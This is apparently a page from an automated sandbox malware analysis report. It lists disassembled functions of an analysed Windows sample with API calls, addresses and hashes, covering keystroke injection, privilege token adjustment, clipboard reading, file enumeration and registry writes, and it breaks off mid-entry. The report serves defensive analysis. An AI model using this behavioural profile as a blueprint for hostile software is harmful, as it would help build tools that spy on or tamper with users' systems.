Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 028e41bccb4a59893289488cf9214521df6aae6937384aacf36ca3ea56f991f8
Instruction ID: cad7acc28a505a6e61bd7fcabc5d59cfc064d918bc9c77b1368f5126c08e24b3
Opcode Fuzzy Hash: 028e41bccb4a59893289488cf9214521df6aae6937384aacf36ca3ea56f991f8
Instruction Fuzzy Hash: D9F0A9B1140749CFCB349F26E480826BBF0BF1432A320A93EE2EBA3650D7319980DF04

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00EE4AD0

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 2b2ecdbf7b7f176b013bdb6dd090c17fb14a081934b0777568f25c1ed6c056ce
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 31F0587280020DFFDF04CF80C941EAABB79FB14324F208189F9199A212D332DA21EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF09E4

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 908073d27e8a885125e3e94ca3726d25eeff32688035f4a4e2431fc37b2cdbf6
Instruction ID: 68ebd106d76d3d2d4125ac19260f426e081aae53e25f8727d136ede4dde52758
Opcode Fuzzy Hash: 908073d27e8a885125e3e94ca3726d25eeff32688035f4a4e2431fc37b2cdbf6
Instruction Fuzzy Hash: C2E0863290012857C721A6989C06FEA77DDEB89791F0401B6FC08D7354D9649C819691

Uniqueness

Uniqueness Score: -1.00%

Function 00EE42AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00F206E6,00000000,00000000,00000000), ref: 00EE42BF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d38d2464db9d9f0bb1335880f90e59db673fcc5cd2ab141b1f58678328103818
Instruction ID: 11ddc14d57cd5524d6c2996fe9c949804cc36d61b663558c744b72e34d5564bd
Opcode Fuzzy Hash: d38d2464db9d9f0bb1335880f90e59db673fcc5cd2ab141b1f58678328103818
Instruction Fuzzy Hash: 7FD0C97464020CBFEB10CB80DC46FAABBBCEB05710F200294FE04A6290E6F27E509B95

Uniqueness

Uniqueness Score: -1.00%

Function 00EF2E74 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EF3447: __lock.LIBCMT ref: 00EF3449

__onexit_nolock.LIBCMT ref: 00EF2E90

Part of subcall function 00EF2EB8: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2ECB
Part of subcall function 00EF2EB8: DecodePointer.KERNEL32(?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2ED6
Part of subcall function 00EF2EB8: __realloc_crt.LIBCMT ref: 00EF2F17
Part of subcall function 00EF2EB8: __realloc_crt.LIBCMT ref: 00EF2F2B
Part of subcall function 00EF2EB8: EncodePointer.KERNEL32(00000000,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2F3D
Part of subcall function 00EF2EB8: EncodePointer.KERNEL32(00F0B7EA,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2F4B
Part of subcall function 00EF2EB8: EncodePointer.KERNEL32(00000004,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2F57

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 6e2545c81b8f2723d909cfb3a489df81561e97f6b447945dfdf5c28bfb543d70
Instruction ID: c4676e44813c170ce967eb3f829c7ab80029d61e5d9cfdd7fbaa35574f38528f
Opcode Fuzzy Hash: 6e2545c81b8f2723d909cfb3a489df81561e97f6b447945dfdf5c28bfb543d70
Instruction Fuzzy Hash: BBD01271D1020DEADB11BBA4D90277D76F06F10722F605149F624762C2CB744A425BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00EF547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00EF5486

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 4f404d61f142ea234910a4f5695b754fbb8d719f342942b12fa6782e1ce0150e
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: D8B0927644020CB7CE112A82EC03A693F699B50668F408020FB1C2C162B673E6A09689

Uniqueness

Uniqueness Score: -1.00%

Function 00F3D6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00F3D842

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: e06cccc9f9934072cdccc63745db89ca248e74fa98c020ca89afaa24aa1cc96e
Instruction ID: 979adfcbb3007cab361360a0020b87446d110684d8c81d43ed732f89c20eada5
Opcode Fuzzy Hash: e06cccc9f9934072cdccc63745db89ca248e74fa98c020ca89afaa24aa1cc96e
Instruction Fuzzy Hash: F971C2306043058FC704EF64D491A6EB7E0EF88324F141A6DF896A73A2DB30ED45DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0E38 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00EF0EE7

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 3d45f9123b512de9052f05769294adedb4ff69c087139f60d3490cddbc7a827f
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8231C571A0010ADFDB19DF58C4809B9F7A6FF59304B649AA5E50AEB252E731EDC1CBC0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F5D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F5D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F5D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5D2B8
SendMessageW.USER32 ref: 00F5D2E1
_wcsncpy.LIBCMT ref: 00F5D359
GetKeyState.USER32 ref: 00F5D37A
GetKeyState.USER32 ref: 00F5D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5D39D
GetKeyState.USER32 ref: 00F5D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5D3D0
SendMessageW.USER32 ref: 00F5D3F7
SendMessageW.USER32(?,00001030,?,00F5B9BA), ref: 00F5D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F5D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F5D526
SetCapture.USER32(?), ref: 00F5D52F
ClientToScreen.USER32(?,?), ref: 00F5D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F5D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F5D5BB
ReleaseCapture.USER32(?,?,?), ref: 00F5D5C6
GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 00F5D600
ScreenToClient.USER32 ref: 00F5D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5D669
SendMessageW.USER32 ref: 00F5D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D6D4
SendMessageW.USER32 ref: 00F5D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F5D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F5D733
GetCursorPos.USER32(?), ref: 00F5D753
ScreenToClient.USER32 ref: 00F5D760
GetParent.USER32(?), ref: 00F5D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5D7E9
SendMessageW.USER32 ref: 00F5D81A
ClientToScreen.USER32(?,?), ref: 00F5D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F5D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D8D2
SendMessageW.USER32 ref: 00F5D8F5
ClientToScreen.USER32(?,?), ref: 00F5D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F5D97B

Part of subcall function 00ED29AB: GetWindowLongW.USER32(?,000000EB), ref: 00ED29BC

GetWindowLongW.USER32(?,000000F0), ref: 00F5DA17

Strings

@GUI_DRAGID, xrefs: 00F5D562
F, xrefs: 00F5D8FB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: c3c84f801fb3895c48e82881cf795874e86fd8d188652fdc7890b774c9e4ea2f
Instruction ID: 9cbab2c7f88b568a6237a4a0e0d934851826e17941ea9769ef667c24ea31a2af
Opcode Fuzzy Hash: c3c84f801fb3895c48e82881cf795874e86fd8d188652fdc7890b774c9e4ea2f
Instruction Fuzzy Hash: 1D42BF30606745AFD734DF24C844F6ABBE5FF48321F140519FA95872A1CBB1D858EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00EE5EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F210D7
IsIconic.USER32 ref: 00F210E0
ShowWindow.USER32(?,00000009), ref: 00F210ED
SetForegroundWindow.USER32(?), ref: 00F210F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F2110D
GetCurrentThreadId.KERNEL32 ref: 00F21114
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F21120
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F21131
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F21139
AttachThreadInput.USER32(00000000,?,00000001), ref: 00F21141
SetForegroundWindow.USER32(?), ref: 00F21144
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F21159
keybd_event.USER32 ref: 00F21164
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F2116E
keybd_event.USER32 ref: 00F21173
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F2117C
keybd_event.USER32 ref: 00F21181
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F2118B
keybd_event.USER32 ref: 00F21190
SetForegroundWindow.USER32(?), ref: 00F21193
AttachThreadInput.USER32(?,?,00000000), ref: 00F211BA

Strings

Shell_TrayWnd, xrefs: 00F210D2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: b75eeb7890f92db59c3240eefc4350e8f6a5c3a7d02219fcf50f2d7009d70020
Instruction ID: a94e0cf93114bec410c174d3a38c9ef0593734e704344d7c2babad03907ccac7
Opcode Fuzzy Hash: b75eeb7890f92db59c3240eefc4350e8f6a5c3a7d02219fcf50f2d7009d70020
Instruction Fuzzy Hash: 5C315271A4031CBAEB206BA19C49F7F3E6CEB44B60F244016FA05AA1D1CAF15D50BEA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F28F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00F29399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F293E3
Part of subcall function 00F29399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F29410
Part of subcall function 00F29399: GetLastError.KERNEL32 ref: 00F2941D

_memset.LIBCMT ref: 00F28F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F28FC3
CloseHandle.KERNEL32(?), ref: 00F28FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F28FEB
GetProcessWindowStation.USER32 ref: 00F29004
SetProcessWindowStation.USER32(00000000), ref: 00F2900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F29028

Part of subcall function 00F28DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F28F27), ref: 00F28DFE
Part of subcall function 00F28DE9: CloseHandle.KERNEL32(?,?,00F28F27), ref: 00F28E10

Strings

, xrefs: 00F28F80
winsta0, xrefs: 00F28FE6
default, xrefs: 00F29023

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 43038ba5e0a0c1daf330b9c8c98953887d0d5ddf714a8c5aa650ced37be95ae5
Instruction ID: c67bd6efddacac85808b70e6441b77bb951a3f6df39052ea6a1d6a485ecefdcd
Opcode Fuzzy Hash: 43038ba5e0a0c1daf330b9c8c98953887d0d5ddf714a8c5aa650ced37be95ae5
Instruction Fuzzy Hash: 58817B71C0421DBFDF119FA0EC49AEE7B79EF04314F144119F920A7261DBB28E25AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00F44632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00F60980), ref: 00F4465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00F4466A
GetClipboardData.USER32 ref: 00F44672
CloseClipboard.USER32 ref: 00F4467E
GlobalLock.KERNEL32 ref: 00F4469A
CloseClipboard.USER32 ref: 00F446A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00F446B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00F446C6
GetClipboardData.USER32 ref: 00F446CE
GlobalLock.KERNEL32 ref: 00F446DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00F4470F
CloseClipboard.USER32(00000001,00000000), ref: 00F4481F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 6decb318659eebf96800427e75263d1af047daaa5641d66eea9149dbe3439180
Instruction ID: dfb773d83602b4e91a6a43bf70f6abdae78e8dbda3436c39ae3f8385b4b75fb0
Opcode Fuzzy Hash: 6decb318659eebf96800427e75263d1af047daaa5641d66eea9149dbe3439180
Instruction Fuzzy Hash: 9E51B5712042496BD300EF60DC59F6FB7A8AF84B50F10052DF966E21E1DF70E905AB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F3CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F3CDD0
FindClose.KERNEL32(00000000), ref: 00F3CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F3CE87
__swprintf.LIBCMT ref: 00F3CED3
__swprintf.LIBCMT ref: 00F3CF16

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

__swprintf.LIBCMT ref: 00F3CF6A

Part of subcall function 00EF38C8: __woutput_l.LIBCMT ref: 00EF3921

__swprintf.LIBCMT ref: 00F3CFB8

Part of subcall function 00EF38C8: __flsbuf.LIBCMT ref: 00EF3943
Part of subcall function 00EF38C8: __flsbuf.LIBCMT ref: 00EF395B

__swprintf.LIBCMT ref: 00F3D007
__swprintf.LIBCMT ref: 00F3D056
__swprintf.LIBCMT ref: 00F3D0A5

Strings

%02d, xrefs: 00F3CF5E, 00F3CF68, 00F3CFB6, 00F3D005, 00F3D054, 00F3D0A3
%4d%02d%02d%02d%02d%02d, xrefs: 00F3CECD
%4d, xrefs: 00F3CF10

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 56f36e41150a7df8a4e9df7b9d79a6c24507dd0e6b7f6170910b66851327133c
Instruction ID: 68b7d6bd2d7ec093a374fedff2af379a74126f3cc555d910383823a4b5a462dc
Opcode Fuzzy Hash: 56f36e41150a7df8a4e9df7b9d79a6c24507dd0e6b7f6170910b66851327133c
Instruction Fuzzy Hash: 5EA15CB1404344ABC714EFA4C885DAFB7ECEF94700F40191AF595E3291EB34EA49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F3F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74CB61D0,?,00000000), ref: 00F3F5F9
_wcscmp.LIBCMT ref: 00F3F60E
_wcscmp.LIBCMT ref: 00F3F625
GetFileAttributesW.KERNEL32(?), ref: 00F3F637
SetFileAttributesW.KERNEL32(?,?), ref: 00F3F651
FindNextFileW.KERNEL32(00000000,?), ref: 00F3F669
FindClose.KERNEL32(00000000), ref: 00F3F674
FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F690
_wcscmp.LIBCMT ref: 00F3F6B7
_wcscmp.LIBCMT ref: 00F3F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F6E0
SetCurrentDirectoryW.KERNEL32(00F8B578), ref: 00F3F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F708
FindClose.KERNEL32(00000000), ref: 00F3F715
FindClose.KERNEL32(00000000), ref: 00F3F727

Strings

*.*, xrefs: 00F3F68B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 410801ec433b2c3e006448a597481dd47b5e837aa9c1dc830ca0a04e426e0e2b
Instruction ID: 6d5353e0be1d0371b63dbff606ae3e96143efbfa6e2be3bc09c6b0358e0ff21a
Opcode Fuzzy Hash: 410801ec433b2c3e006448a597481dd47b5e837aa9c1dc830ca0a04e426e0e2b
Instruction Fuzzy Hash: DD31C371E4021D6ADB10AFB4DC59AEF77ACAF09331F240165F915E31A0DF70DA48EA64

Uniqueness

Uniqueness Score: -1.00%

Function 00F50EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F50FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00F60980,00000000,?,00000000,?,?), ref: 00F51021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F51069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F510F2
RegCloseKey.ADVAPI32(?), ref: 00F51412
RegCloseKey.ADVAPI32(00000000), ref: 00F5141F

Strings

